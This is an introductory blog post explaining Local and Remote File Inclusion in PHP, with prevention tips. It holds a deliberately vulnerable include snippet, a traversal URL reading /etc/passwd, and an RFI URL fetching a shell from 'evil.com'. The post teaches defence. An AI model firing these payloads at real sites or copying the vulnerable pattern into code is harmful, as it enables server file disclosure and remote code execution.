LFI vs RFI — When Your Website Starts Reading the Wrong Files

Every website reads files — like showing you a page called "home.php" or "about.php". But what if a hacker tricks your website into reading…

Natarajan C K

~2 min read · November 4, 2025 (Updated: November 4, 2025) · Free: Yes

Every website reads files — like showing you a page called "home.php" or "about.php". But what if a hacker tricks your website into reading the wrong file — maybe one that stores passwords or secret code? 😱

That's what LFI (Local File Inclusion) and RFI (Remote File Inclusion) are all about. They sound technical, but they're really just two ways a website can be fooled into including files it shouldn't.

🏠 LFI — Local File Inclusion (Reading Local Files)

Imagine your website has this code 👇

<?php
$page = $_GET['page'];
include $page;
?>

If a hacker visits:

http://example.com/index.php?page=../../etc/passwd

The website might include a local file like /etc/passwd — revealing sensitive data on the server. 😬

🧠 In short: LFI happens when attackers make your site include local files on the same server.

🌍 RFI — Remote File Inclusion (Running Remote Files)

Now imagine if your server allows loading files from other websites. The hacker can try:

http://example.com/index.php?page=http://evil.com/shell.txt

If the setting allow_url_include is ON, your website fetches and runs that remote code — giving the attacker full control! 😨

🧠 In short: RFI happens when attackers include and execute remote (outside) files.

💥 How Attackers Can Make It Worse

Once they find LFI/RFI, attackers may:

Read sensitive files like /etc/passwd 🧾
Inject malicious code into logs (log poisoning) 💀
Upload fake "image" files that contain PHP code 🧠
Use wrappers like php://input to execute hidden scripts ⚙️

So, a small inclusion bug can quickly turn into a remote code execution (RCE) attack.

🛡️ How to Prevent It

✅ Don't use user input in file includes — ever. ✅ Use a whitelist of allowed pages, like:

$pages = ['home'=>'home.php', 'about'=>'about.php'];
if (!isset($pages[$_GET['page']])) die("Invalid page!");
include $pages[$_GET['page']];

✅ Turn off risky settings: allow_url_include=Off ✅ Validate input & sanitize file paths. ✅ Keep uploads and logs outside the web folder.

⚖️ Quick Difference

🗂️ LFI — Loads local files from the server (reads or leaks data). 🌐 RFI — Loads remote files from another website (can run code instantly).

🧪 Want to Practice Safely?

Try DVWA (Damn Vulnerable Web App) or TryHackMe's LFI labs — they let you learn in a legal, controlled environment. 💻🧠

✨ Conclusion

LFI and RFI happen when websites include files based on user input without checking them properly.

🧠 Remember:

Never trust user input — especially when it decides what your website reads or runs!

A few simple lines of validation can save your entire server. 🔒💪

#lfi #rfi #security #bug-bounty #cybersecurity